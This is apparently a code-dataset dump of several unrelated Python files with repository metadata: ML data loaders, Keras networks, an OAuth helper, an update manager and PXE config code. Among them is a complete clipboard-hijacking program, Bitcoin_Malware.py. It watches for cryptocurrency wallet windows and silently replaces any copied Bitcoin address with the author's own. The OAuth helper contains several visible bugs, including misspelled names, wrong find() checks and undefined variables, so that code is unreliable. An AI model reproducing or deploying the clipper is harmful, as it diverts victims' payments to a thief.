code = np.array(code, dtype=np.object)
lim = int(pct_train * len(names))
idxs = np.arange(len(names))
np.random.shuffle(idxs)
naming = TokenCodeNamingData(names[idxs[:lim]], code[idxs[:lim]])
return naming.get_data_for_copy_convolution(names[idxs[:lim]], code[idxs[:lim]], names_cx_size, min_code_size),\
naming.get_data_for_copy_convolution(names[idxs[lim:]], code[idxs[lim:]], names_cx_size, min_code_size), naming
def get_data_for_copy_convolution(self, names, code, name_cx_size, sentence_padding):
assert len(names) == len(code), (len(names), len(code), code.shape)
name_targets = []
original_targets = []
name_contexts = []
original_names_ids = []
code_sentences = []
original_code = []
copy_vector = []
target_is_unk = []
padding = [self.all_tokens_dictionary.get_id_or_unk(self.NONE)]
for i, name in enumerate(names):
code_sentence = [self.all_tokens_dictionary.get_id_or_unk(t) for t in code[i]]
if sentence_padding % 2 == 0:
code_sentence = padding * (sentence_padding / 2) + code_sentence + padding * (sentence_padding / 2)
else:
code_sentence = padding * (sentence_padding / 2 + 1) + code_sentence + padding * (sentence_padding / 2)
for j in xrange(1, len(name)): # First element should always be predictable (ie sentence start)
name_targets.append(self.all_tokens_dictionary.get_id_or_unk(name[j]))
original_targets.append(name[j])
target_is_unk.append(self.all_tokens_dictionary.is_unk(name[j]))
original_names_ids.append(i)
context = name[:j]
if len(context) < name_cx_size:
context = [self.NONE] * (name_cx_size - len(context)) + context
else:
context = context[-name_cx_size:]
assert len(context) == name_cx_size, (len(context), name_cx_size,)
name_contexts.append([self.name_dictionary.get_id_or_unk(t) for t in context])
code_sentences.append(np.array(code_sentence, dtype=np.int32))
original_code.append(code[i])
tokens_to_be_copied = [t == name[j] for t in code[i]]
copy_vector.append(np.array(tokens_to_be_copied, dtype=np.int32))
name_targets = np.array(name_targets, dtype=np.int32)
name_contexts = np.array(name_contexts, dtype=np.int32)
code_sentences = np.array(code_sentences, dtype=np.object)
original_names_ids = np.array(original_names_ids, dtype=np.int32)
copy_vector = np.array(copy_vector, dtype=np.object)
target_is_unk = np.array(target_is_unk, dtype=np.int32)
return name_targets, original_targets, name_contexts, code_sentences, original_code, copy_vector, target_is_unk, original_names_ids
def get_suggestions_given_name_prefix(self, next_name_log_probs, name_cx_size, max_predicted_identifier_size=5, max_steps=100):
suggestions = defaultdict(lambda: float('-inf')) # A list of tuple of full suggestions (token, prob)
# A stack of partial suggestion in the form ([subword1, subword2, ...], logprob)
possible_suggestions_stack = [
([self.NONE] * (name_cx_size - 1) + [self.SUBTOKEN_START], [], 0)]
# Keep the max_size_to_keep suggestion scores (sorted in the heap). Prune further exploration if something has already
# lower score
predictions_probs_heap = [float('-inf')]
max_size_to_keep = 15
nsteps = 0
while True:
scored_list = []
while len(possible_suggestions_stack) > 0:
subword_tokens = possible_suggestions_stack.pop()
# If we're done, append to full suggestions
if subword_tokens[0][-1] == self.SUBTOKEN_END:
final_prediction = tuple(subword_tokens[1][:-1])
if len(final_prediction) == 0:
continue
log_prob_of_suggestion = np.logaddexp(suggestions[final_prediction], subword_tokens[2])
if log_prob_of_suggestion > predictions_probs_heap[0] and not log_prob_of_suggestion == float('-inf'):
# Push only if the score is better than the current minimum and > 0 and remove extraneous entries
suggestions[final_prediction] = log_prob_of_suggestion
heapq.heappush(predictions_probs_heap, log_prob_of_suggestion)
if len(predictions_probs_heap) > max_size_to_keep:
heapq.heappop(predictions_probs_heap)
continue
elif len(subword_tokens[1]) > max_predicted_identifier_size: # Stop recursion here
continue
# Convert subword context
context = [self.name_dictionary.get_id_or_unk(k) for k in
subword_tokens[0][-name_cx_size:]]
assert len(context) == name_cx_size
context = np.array([context], dtype=np.int32)
# Predict next subwords
target_subword_logprobs = next_name_log_probs(context)
def get_possible_options(name_id):
# TODO: Handle UNK differently?
subword_name = self.all_tokens_dictionary.get_name_for_id(name_id)
if subword_name == self.all_tokens_dictionary.get_unk():
subword_name = "***"
name = subword_tokens[1] + [subword_name]
return subword_tokens[0][1:] + [subword_name], name, target_subword_logprobs[0, name_id] + \
subword_tokens[2]
top_indices = np.argsort(-target_subword_logprobs[0])
possible_options = [get_possible_options(top_indices[i]) for i in xrange(max_size_to_keep)]
# Disallow suggestions that contain duplicated subtokens.
scored_list.extend(filter(lambda x: len(x[1])==1 or x[1][-1] != x[1][-2], possible_options))
# Prune
scored_list = filter(lambda suggestion: suggestion[2] >= predictions_probs_heap[0] and suggestion[2] >= float('-inf'), scored_list)
scored_list.sort(key=lambda entry: entry[2], reverse=True)
# Update
possible_suggestions_stack = scored_list[:max_size_to_keep]
nsteps += 1
if nsteps >= max_steps:
break
# Sort and append to predictions
suggestions = [(identifier, np.exp(logprob)) for identifier, logprob in suggestions.items()]
suggestions.sort(key=lambda entry: entry[1], reverse=True)
# print suggestions
return suggestions
| 51.953744
| 143
| 0.644338
| 3,038
| 23,587
| 4.682357
| 0.087558
| 0.022777
| 0.020387
| 0.035571
| 0.68471
| 0.651107
| 0.624394
| 0.603866
| 0.578278
| 0.554517
| 0
| 0.008087
| 0.255607
| 23,587
| 453
| 144
| 52.068433
| 0.802085
| 0.061347
| 0
| 0.497222
| 0
| 0
| 0.003678
| 0
| 0
| 0
| 0
| 0.002208
| 0.061111
| 1
| 0.069444
| false
| 0
| 0.019444
| 0.002778
| 0.166667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a82c44a1683f511d5f99fbda3a6f12bd84f86c4c
| 550
|
py
|
Python
|
test_word.py
|
AsherSeiling/Ap-hug-Vocab-database
|
fbf29a225e81a5807b6ff4e06fbb24e88ce55a6a
|
[
"MIT"
] | null | null | null |
test_word.py
|
AsherSeiling/Ap-hug-Vocab-database
|
fbf29a225e81a5807b6ff4e06fbb24e88ce55a6a
|
[
"MIT"
] | 1
|
2021-02-27T06:12:07.000Z
|
2021-03-01T14:32:39.000Z
|
test_word.py
|
AsherSeiling/Ap-hug-Vocab-database
|
fbf29a225e81a5807b6ff4e06fbb24e88ce55a6a
|
[
"MIT"
] | 1
|
2021-02-27T06:14:55.000Z
|
2021-02-27T06:14:55.000Z
|
words = open("words.txt", "r")
words = [x.rstrip("\n") for x in words.readlines()]
refwords = open("referencewords.txt", "r")
refwords = [x.strip("\n") for x in refwords.readlines()]
def find_word(word):
retunrval = False
if word.lower() in words:
retunrval = True
return retunrval
words_needed = []
def main():
for items in refwords:
buffer = ""
for i in items:
if i != " ":
buffer += i
testword = find_word(buffer.lower())
if testword == False:
words_needed.append(items.lower())
main()
for i in words_needed:
print(i)
| 20.37037
| 56
| 0.650909
| 81
| 550
| 4.358025
| 0.37037
| 0.05949
| 0.028329
| 0.03966
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.187273
| 550
| 27
| 57
| 20.37037
| 0.789709
| 0
| 0
| 0
| 0
| 0
| 0.061706
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0
| 0
| 0
| 0.136364
| 0.045455
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a82ef552d3bf70dc77e897c13a1b0f9b584ffa9d
| 3,359
|
py
|
Python
|
src/keras_networks.py
|
RU-IIPL/2DLD_keras
|
8c291b6a652f54bd94cb3a5c8382d10ba42e5cbf
|
[
"MIT"
] | 1
|
2021-05-24T08:00:29.000Z
|
2021-05-24T08:00:29.000Z
|
src/keras_networks.py
|
RU-IIPL/2DLD_keras
|
8c291b6a652f54bd94cb3a5c8382d10ba42e5cbf
|
[
"MIT"
] | null | null | null |
src/keras_networks.py
|
RU-IIPL/2DLD_keras
|
8c291b6a652f54bd94cb3a5c8382d10ba42e5cbf
|
[
"MIT"
] | 1
|
2021-09-29T03:43:46.000Z
|
2021-09-29T03:43:46.000Z
|
# -*- coding: utf-8 -*-
"""
@author: Terada
"""
from keras.models import Sequential, Model
from keras.layers import Dense, MaxPooling2D, Flatten, Dropout
from keras.layers import Conv2D, BatchNormalization, ZeroPadding2D, MaxPool2D
from keras.layers import Input, Convolution2D, AveragePooling2D, merge, Reshape, Activation, concatenate
from keras.regularizers import l2
#from keras.engine.topology import Container
def net7(input_size):
model = Sequential()
model.add(Conv2D(32, (3, 3), activation='relu', input_shape=(input_size[0], input_size[1], 1)))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(32, (3, 3), activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(64, (3, 3), activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(64, (3, 3), activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Flatten())
model.add(Dense(1000, activation='relu'))
model.add(Dense(500, activation='relu'))
model.add(Dense(28))
return model
def lenet(input_size):
model = Sequential()
model.add(Conv2D(20, kernel_size=5, strides=1, activation='relu', input_shape=(input_size[0], input_size[1], 1)))
model.add(MaxPooling2D(2, strides=2))
model.add(Conv2D(50, kernel_size=5, strides=1, activation='relu'))
model.add(MaxPooling2D(2, strides=2))
model.add(Flatten())
model.add(Dense(500, activation='relu'))
model.add(Dense(28)) #activation='softmax'
return model
def alexnet(input_size):
model = Sequential()
model.add(Conv2D(48, 11, strides=3, activation='relu', padding='same', input_shape=(input_size[0], input_size[1], 1)))
model.add(MaxPooling2D(3, strides=2))
model.add(BatchNormalization())
model.add(Conv2D(128, 5, strides=3, activation='relu', padding='same'))
model.add(MaxPooling2D(3, strides=2))
model.add(BatchNormalization())
model.add(Conv2D(192, 3, strides=1, activation='relu', padding='same'))
model.add(Conv2D(192, 3, strides=1, activation='relu', padding='same'))
model.add(Conv2D(128, 3, strides=1, activation='relu', padding='same'))
model.add(MaxPooling2D(3, strides=2))
model.add(BatchNormalization())
model.add(Flatten())
model.add(Dense(2048, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(2048, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(28)) #activation='softmax'
return model
def malti_net(input_size):
inputs = Input(shape=(input_size[0], input_size[1], 1))
conv1 = Conv2D(18, (3, 3), activation='relu')(inputs)
pool1 = MaxPooling2D(pool_size=(2, 2))(conv1)
conv2 = Conv2D(32, (3, 3), activation='relu')(pool1)
pool2 = MaxPooling2D(pool_size=(2, 2))(conv2)
conv3 = Conv2D(32, (3, 3), activation='relu')(pool2)
pool3 = MaxPooling2D(pool_size=(2, 2))(conv3)
conv4 = Conv2D(64, (3, 3), activation='relu')(pool3)
pool4 = MaxPooling2D(pool_size=(2, 2))(conv4)
flat1 = Flatten()(pool4)
fc1 = Dense(1000, activation='relu')(flat1)
fc2 = Dense(500, activation='relu')(fc1)
x_main = Dense(28, name='main')(fc2)
x_sub1 = Dense(2, name='sub1', activation='softmax')(fc2)
x_sub2 = Dense(5, name='sub2', activation='softmax')(fc2)
model = Model(inputs=inputs, outputs=[x_main, x_sub1, x_sub2])
return model
| 42.518987
| 122
| 0.677583
| 469
| 3,359
| 4.784648
| 0.181237
| 0.128342
| 0.068627
| 0.088235
| 0.665775
| 0.620321
| 0.566845
| 0.487077
| 0.4541
| 0.407754
| 0
| 0.072772
| 0.144984
| 3,359
| 78
| 123
| 43.064103
| 0.708565
| 0.036023
| 0
| 0.514706
| 0
| 0
| 0.041525
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.058824
| false
| 0
| 0.073529
| 0
| 0.191176
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a830be9674eca4b0486b3f40d92cbb270322784c
| 2,327
|
py
|
Python
|
Bitcoin_Malware.py
|
Ismael-Safadi/Bitcoin-Wallet-address-spoofer
|
16b92d5538d10a2b14ee1fed441a25bdb33a2e67
|
[
"MIT"
] | 7
|
2019-03-04T14:28:53.000Z
|
2022-01-31T12:11:53.000Z
|
Bitcoin_Malware.py
|
Ismael-Safadi/Bitcoin-Wallet-address-spoofer
|
16b92d5538d10a2b14ee1fed441a25bdb33a2e67
|
[
"MIT"
] | null | null | null |
Bitcoin_Malware.py
|
Ismael-Safadi/Bitcoin-Wallet-address-spoofer
|
16b92d5538d10a2b14ee1fed441a25bdb33a2e67
|
[
"MIT"
] | 4
|
2019-03-04T14:29:01.000Z
|
2022-01-31T12:11:40.000Z
|
# Coded By : Ismael Al-safadi
from win32gui import GetWindowText, GetForegroundWindow
from pyperclip import copy
from re import findall
from win32clipboard import OpenClipboard , GetClipboardData , CloseClipboard
from time import sleep
class BitcoinDroper:
"""
class for spoofing Bitcoin Wallet address .
Methods :
check_active_window : for check active window.
check_bitcoin_wallet : This method will check if the copied data right now
is as Bitcoin Wallet address or not.
return_copied_wallet : this function will return the old address .
spoof_wallet : Function for change address to your.
get_old_wallet : Function for getting the old address .
spoofing_done : Function to show if spoofing done or not .
"""
def __init__(self):
# You can add many of bitcoin wallets names into the list
self.list_of_btc = ['blockchain','exodus','coinbase','electrum' , 'bitcoin','bitstamp']
self.destination_address = "Your Bitcoin address wallet"
self.done = False
def check_active_window(self):
window = (GetWindowText(GetForegroundWindow())[0:44])
window = str(window).lower()
if any(ext in window for ext in self.list_of_btc):
return True
else:
return False
def check_bitcoin_wallet(self):
OpenClipboard()
data = GetClipboardData()
CloseClipboard()
l = findall('[a-zA-Z0-9]{34}', data)
if len(l) == 1:
return True
else:
return False
def return_copied_wallet(self):
copy(self.old_wallet)
def spoof_wallet(self):
copy(self.destination_address)
self.done = True
def get_old_wallet(self):
OpenClipboard()
self.old_wallet = GetClipboardData()
CloseClipboard()
def spoofing_done(self):
return self.done
a = BitcoinDroper()
while True:
if a.check_active_window() and a.check_bitcoin_wallet():
if not a.spoofing_done():
a.get_old_wallet()
a.spoof_wallet()
elif a.spoofing_done():
if a.check_bitcoin_wallet() and not a.check_active_window():
a.return_copied_wallet()
sleep(2)
| 31.026667
| 96
| 0.628277
| 277
| 2,327
| 5.108303
| 0.34657
| 0.055124
| 0.060071
| 0.018375
| 0.039576
| 0.039576
| 0
| 0
| 0
| 0
| 0
| 0.007932
| 0.29566
| 2,327
| 74
| 97
| 31.445946
| 0.8554
| 0.243661
| 0
| 0.212766
| 0
| 0
| 0.054434
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.148936
| false
| 0
| 0.106383
| 0.021277
| 0.382979
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a8347276bdea4347d1187329f50e22db158c90b3
| 5,096
|
py
|
Python
|
Stock_Programs/myOauth.py
|
timwroge/DeepPurple
|
3d6f3203938853ede654ef4f88b7451a1ba3999e
|
[
"Apache-2.0"
] | 4
|
2020-02-13T18:57:41.000Z
|
2020-08-03T21:08:26.000Z
|
Stock_Programs/myOauth.py
|
timwroge/DeepPurple
|
3d6f3203938853ede654ef4f88b7451a1ba3999e
|
[
"Apache-2.0"
] | null | null | null |
Stock_Programs/myOauth.py
|
timwroge/DeepPurple
|
3d6f3203938853ede654ef4f88b7451a1ba3999e
|
[
"Apache-2.0"
] | 1
|
2021-06-14T13:42:39.000Z
|
2021-06-14T13:42:39.000Z
|
import urllib.parse, urllib.request,json
import time
import hmac, hashlib,random,base64
#yahoo stuff
#client ID dj0yJmk9S3owYWNNcm1jS3VIJmQ9WVdrOU1HMUZiMHh5TjJNbWNHbzlNQS0tJnM9Y29uc3VtZXJzZWNyZXQmeD0xOQ--
#client secret ID fcde44eb1bf2a7ff474b9fd861a6fcf33be56d3f
def setConsumerCreds(cons_key,cons_secret):
global consumerKey
global consumerSecret
consumerKey = cons_key
consumerSecret = cons_secret
def set_access_token(key,secret):
global accessToken
global accessTokenSecret
accessToken = key
accessTokenSecret = secret
def get_base_string(resourceUrl, values,method="POST"):
baseString = method+"&"+url_encode(resourceUrl) + "&"
sortedKeys = sorted(values.keys())
for i in range(len(sortedKeys)):
baseString += url_encode(sortedKEys[i] + "=") + url_encode(url_encode(values[sortedKeys[i]]))
if i < len(sortedKeys) - 1:
baseString += url_encode("&")
return baseString
def add_oauth_parameters(parameters, addAccessToken = True):
parameters["oauth_consumer_key"] = consumerKey
if (addAccessToken):
parameters["oauth_token"] = accessToken
parameters["oauth_version"] = "1.0"
parameters["oauth_nonce"] = str(get_nonce())
parameters["oauth_timestamp"] = str(get_timestamp())
parameters["oauth_signature_method"]= "HMAC-SHA1"
def get_nonce():
return random.randint(1,999999999)
def get_timestamp():
return int(time.time())
def get_signature(signingKey,stringToHash):
hmacAlg = hmac.HMAC(signingKey,stringToHash,hashlib.sha1)
return base64.b64encode(hmacAlg.digest())
def url_encode(data):
return urllib.parse.quote(data,"")
def build_oauth_headers(parameters):
header = "OAuth "
sortedKeys = sorted(parameters.keys())
for i in range(len(sortedKeys)):
header = header+ url_encode(sortedKeys[i]) + "=\"" + url_encode(parameters[sortedKeys[i]]) + "\""
if i < len(sortedKeys) - 1:
header = header + ","
return header
##### ACTUAL FUNCTIONS
def get_authorization_url(resourceUrl,endpointUrl,callbackUrl):
oauthParameters = {}
add_oauth_parameters(oauthParameters, False)
oauthParameters["oauth_callback"] = callbackUrl
baseString = get_base_string(resourceUrl,OauthParameters)
signingKey = consumerSecret + "&"
oauthParameters["oauth_signature"] = get_signature(signingKey,baseString)
headers = build_oauth_headers(oauthParameters)
httpRequest = urllib.request.Request(resourceUrl)
httpRequest.add_header("Authorization",headers)
try:
httpResponse = urllib.request.urlopen(httpRequest)
except urllib.request.HTTPError as e:
return "Response: %s" % e.read()
responseData = httpResponse.read()
responseParameters = responseData.split("&")
for string in responseParameters:
if string.find("oauth_token_secret") -1: requestTokenSecret = string.split("=")[1]
elif string.find("oauth_token") -1: requestToken = string.split("=")[1]
return endpointUrl+"?oauth_token="+requestToken
def get_access_token(resourceUrl, requestTok, requestTokSecret, oauth_verifier):
global requestToken,requestTokenSecret,accessToken,accessTokenSecret
requestToken = requestTok
requestTokenSecret = requestTokSecret
oauthParmeters = {"oauth_verfier" : oauth_verifier,"oauth_token":requestToken}
add_oauth_paremeters(oauthParameters,False)
baseString = get_base_string(resourceUrl,oauthParameters)
signingKey = consumerSecret + "&" + requestTokenSecret
oauthParameters["oauth_signature"] = get_signature(signingKey,baseString)
header = build_oauth_headers(oauthParameters)
httpRquest = urllib.request.Request(resourceUrl)
httpRequest.add_header("Authorization",header)
httpResponse = urllib.request.urlopen(httpRequest)
responseParameters = httpResponse.read().split("&")
for string in responseParameters:
if string.find("oauth_token_secret")-1:
accessTokenSecret = string.split("=")[1]
elif string.find("oauth_token")-1:
accessToken = string.split("=")[1]
def get_api_response(resourceUrl,method="POST",parameters={}):
add_oauth_parameters(parameters)
baseString = get_base_string(resourceUrl,parameters,method)
signingKey = consumerSecret + "&" + accessTokenSecret
parameters["oauth_signature"] = get_signature(signingKey,baseString)
parameters2 = {}
for string in sorted(parameters.keys()):
if string.finds("oauth_") == 1:
parameters2[s] = parameters.pop(s)
header = build_oauth_headers(parameters)
httpRequest = urllib.request.Request(resourceUrl,urllib.parse.urlencode(parameters2))
httpRequest.add_header("Authorization",header)
httpResponse = urllib.request.urlopen(httpRequest)
respStr = httpResponse.read()
def yqlQuery(query):
baseUrl = "https://query.yahooapis.com/v1/public/yql?"
searchUrl = baseUrl + urllib.parse.quote(query)
result= urllib.request.urlopen(searchUrl).read()
data = json.loads(result)
return data["query"]["results"]
| 41.770492
| 116
| 0.724882
| 518
| 5,096
| 6.978764
| 0.247104
| 0.032365
| 0.014385
| 0.026556
| 0.296819
| 0.260858
| 0.232089
| 0.167358
| 0.100692
| 0.080221
| 0
| 0.015684
| 0.161695
| 5,096
| 121
| 117
| 42.115702
| 0.830524
| 0.040424
| 0
| 0.12381
| 0
| 0
| 0.090145
| 0.012088
| 0
| 0
| 0
| 0
| 0
| 1
| 0.12381
| false
| 0
| 0.028571
| 0.028571
| 0.238095
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a8347a798c6edcafbe98def909244e3a366c1264
| 5,246
|
py
|
Python
|
IOController/src/UpdateManager.py
|
MicrosoftDX/liquidintel
|
8c3f840f88ca3515cc812078a620e2a845978177
|
[
"MIT"
] | 9
|
2017-05-27T20:42:46.000Z
|
2020-11-12T21:03:28.000Z
|
IOController/src/UpdateManager.py
|
MicrosoftDX/liquidintel
|
8c3f840f88ca3515cc812078a620e2a845978177
|
[
"MIT"
] | 30
|
2017-02-16T19:43:18.000Z
|
2018-01-17T21:17:01.000Z
|
IOController/src/UpdateManager.py
|
MicrosoftDX/liquidintel
|
8c3f840f88ca3515cc812078a620e2a845978177
|
[
"MIT"
] | 6
|
2017-02-24T03:40:04.000Z
|
2020-11-22T20:29:11.000Z
|
import os, sys, logging, threading, tempfile, shutil, tarfile, inspect
from ConfigParser import RawConfigParser
import requests
from DXLiquidIntelApi import DXLiquidIntelApi
log = logging.getLogger(__name__)
class UpdateManager:
def __init__(self, liquidApi, packageType, checkUnpublished, packageCheckInterval, configuredInstallDir):
self._liquidApi = liquidApi
# We assume the last segment in the installation directory is the version label
(self._baseInstallDir, self._semanticVersion) = os.path.split(self._getInstallDir(configuredInstallDir))
self._packageType = packageType
self._checkUnpublished = checkUnpublished
self._packageCheckInterval = packageCheckInterval
self._restartRequired = False
# Initial check is synchronous
self.checkForNewVersion()
def __enter__(self):
pass
def __exit__(self, type, value, traceback):
if self._timer:
self._timer.cancel()
def checkForNewVersion(self):
self._timer = None
restartTimer = True
log.info('Checking for newer version from package manager api')
packages = self._liquidApi.getInstallationPackages(self._semanticVersion, self._packageType.value, self._checkUnpublished.value)
if len(packages) > 0:
log.info('New installation packages detected: %s', packages)
installPackage = packages[-1]
newInstallDir = os.path.join(self._baseInstallDir, installPackage["Version"])
log.info('Installing package version: %s at: %s. Download location: %s. %s', installPackage["Version"], newInstallDir, installPackage["PackageUri"], installPackage["Description"])
try:
# Download the package
downloadReq = requests.get(installPackage["PackageUri"], stream = True)
downloadReq.raise_for_status()
# Create a new installation directory, using the version label
if os.path.exists(newInstallDir):
log.warning('Installation directory %s already exists - this will overwrite existing contents', newInstallDir)
else:
os.makedirs(newInstallDir)
# Assume package content is .tar.gz - unfortunately we can't stream the response directly into the tar extractor as the
# HTTP response stream doesn't support seek()
with tempfile.NamedTemporaryFile(prefix="package-tarball-", suffix=".tar.gz", delete=False) as fd:
shutil.copyfileobj(downloadReq.raw, fd)
fd.seek(0)
tar = tarfile.open(fileobj=fd)
tar.extractall(newInstallDir)
# Point the symlink to the new directory
if sys.platform != 'win32':
currentSymlink = os.path.join(self._baseInstallDir, 'current')
if os.path.exists(currentSymlink):
os.remove(currentSymlink)
os.symlink(newInstallDir, currentSymlink)
# Check if this version has any configuration that we need to apply locally
if 'Configuration' in installPackage and installPackage['Configuration']:
configFile = os.path.join(newInstallDir, 'IOController.cfg')
log.info('Writing version-specific configuration to: %s', configFile)
config = RawConfigParser()
# Convert from JSON form to .INI form by intepreting all object values as sections
# and all others as primitive values in the parent section
# Top level should be section names with values
for (section, values) in installPackage['Configuration'].items():
if not isinstance(values, dict):
log.warning('Package configuration for keg/section: %s does not contain an object. Non-objects are not supported.', section);
else:
config.add_section(section)
for (setting, value) in values.items():
config.set(section, setting, value)
with open(configFile, 'w') as fd:
config.write(fd)
self._restartRequired = True
# No need to restart the timer as we're bailing on the next main loop iteration
restartTimer = False
except:
log.warning('Failed to download installation package. Will retry on next interval.', exc_info=1)
if restartTimer:
self._timer = threading.Timer(self._packageCheckInterval.value, self.checkForNewVersion)
self._timer.start()
@property
def restartRequired(self):
return self._restartRequired
@property
def semanticVersion(self):
return self._semanticVersion
def _getInstallDir(self, configuredInstallDir):
if configuredInstallDir or sys.platform == 'win32':
return configuredInstallDir
return os.path.dirname(os.path.realpath(inspect.getabsfile(UpdateManager)))
| 51.940594
| 191
| 0.62276
| 510
| 5,246
| 6.319608
| 0.411765
| 0.014893
| 0.009308
| 0.008688
| 0.017375
| 0
| 0
| 0
| 0
| 0
| 0
| 0.002186
| 0.302326
| 5,246
| 100
| 192
| 52.46
| 0.878415
| 0.138582
| 0
| 0.052632
| 0
| 0.013158
| 0.130551
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.092105
| false
| 0.013158
| 0.052632
| 0.026316
| 0.210526
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a834a938200061353abd64e3aa79cc1eac77b3bf
| 2,511
|
py
|
Python
|
python/jinja2_template.py
|
bismog/leetcode
|
13b8a77045f96e7c59ddfe287481f6aaa68e564d
|
[
"MIT"
] | null | null | null |
python/jinja2_template.py
|
bismog/leetcode
|
13b8a77045f96e7c59ddfe287481f6aaa68e564d
|
[
"MIT"
] | null | null | null |
python/jinja2_template.py
|
bismog/leetcode
|
13b8a77045f96e7c59ddfe287481f6aaa68e564d
|
[
"MIT"
] | 1
|
2018-08-17T07:07:15.000Z
|
2018-08-17T07:07:15.000Z
|
#!/usr/bin/env python
import os
from jinja2 import Environment, FileSystemLoader
PATH = os.path.dirname(os.path.abspath(__file__))
env = Environment(loader=FileSystemLoader(os.path.join(PATH, 'templates')))
mac_addr = "01:23:45:67:89:01"
PXE_ROOT_DIR = "/data/tftpboot"
pxe_options = {
'os_distribution': 'centos7',
'path_to_vmlinuz': os.path.join(PXE_ROOT_DIR, 'node', mac_addr, 'vmlinuz'),
'path_to_initrd': os.path.join(PXE_ROOT_DIR, 'node', mac_addr, 'initrd.img'),
'path_to_kickstart_cfg': os.path.join(PXE_ROOT_DIR, 'node', mac_addr, 'ks.cfg'),
'pxe_server_ip': '128.0.0.1',
'protocol': 'nfs'
}
def build_pxe_config(ctxt, template):
"""Build the PXE boot configuration file.
This method builds the PXE boot configuration file by rendering the
template with the given parameters.
:param pxe_options: A dict of values to set on the configuration file.
:param template: The PXE configuration template.
:param root_tag: Root tag used in the PXE config file.
:param disk_ident_tag: Disk identifier tag used in the PXE config file.
:returns: A formatted string with the file content.
"""
tmpl_path, tmpl_file = os.path.split(template)
env = Environment(loader=FileSystemLoader(tmpl_path))
template = env.get_template(tmpl_file)
return template.render(ctxt)
def get_pxe_mac_path(mac, delimiter=None):
"""Convert a MAC address into a PXE config file name.
:param mac: A MAC address string in the format xx:xx:xx:xx:xx:xx.
:param delimiter: The MAC address delimiter. Defaults to dash ('-').
:returns: the path to the config file.
"""
if delimiter is None:
delimiter = '-'
mac_file_name = mac.replace(':', delimiter).lower()
mac_file_name = '01-' + mac_file_name
return os.path.join(PXE_ROOT_DIR, 'pxelinux.cfg', mac_file_name)
def get_teml_path():
"""
"""
return os.path.join(PXE_ROOT_DIR, 'template', '01-xx-xx-xx-xx-xx-xx.template')
#def render_template(template_filename, context):
# return env.get_template(template_filename).render(context)
def create_pxe_config_file(pxe_options):
# fname = "output.html"
cname = get_pxe_mac_path(mac_addr)
tname = get_teml_path()
context = {
'pxe_opts': pxe_options
}
with open(cname, 'w') as f:
config = build_pxe_config(context, tname)
f.write(config)
########################################
if __name__ == "__main__":
create_pxe_config_file(pxe_options)
| 31
| 84
| 0.68419
| 364
| 2,511
| 4.486264
| 0.318681
| 0.024495
| 0.029394
| 0.029394
| 0.22229
| 0.169626
| 0.119412
| 0.05695
| 0.05695
| 0
| 0
| 0.011679
| 0.181601
| 2,511
| 80
| 85
| 31.3875
| 0.782968
| 0.329351
| 0
| 0
| 0
| 0
| 0.159669
| 0.031807
| 0
| 0
| 0
| 0
| 0
| 1
| 0.105263
| false
| 0
| 0.052632
| 0
| 0.236842
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a837db7dbbd9e3811093f9342986a637e65f9e07
| 1,101
|
py
|
Python
|
school_system/users/admin.py
|
SanyaDeath/BIA-school-system
|
d07e4e86f91cf1e24c211cc9f5524c50da45b0e5
|
[
"BSD-3-Clause"
] | null | null | null |
school_system/users/admin.py
|
SanyaDeath/BIA-school-system
|
d07e4e86f91cf1e24c211cc9f5524c50da45b0e5
|
[
"BSD-3-Clause"
] | null | null | null |
school_system/users/admin.py
|
SanyaDeath/BIA-school-system
|
d07e4e86f91cf1e24c211cc9f5524c50da45b0e5
|
[
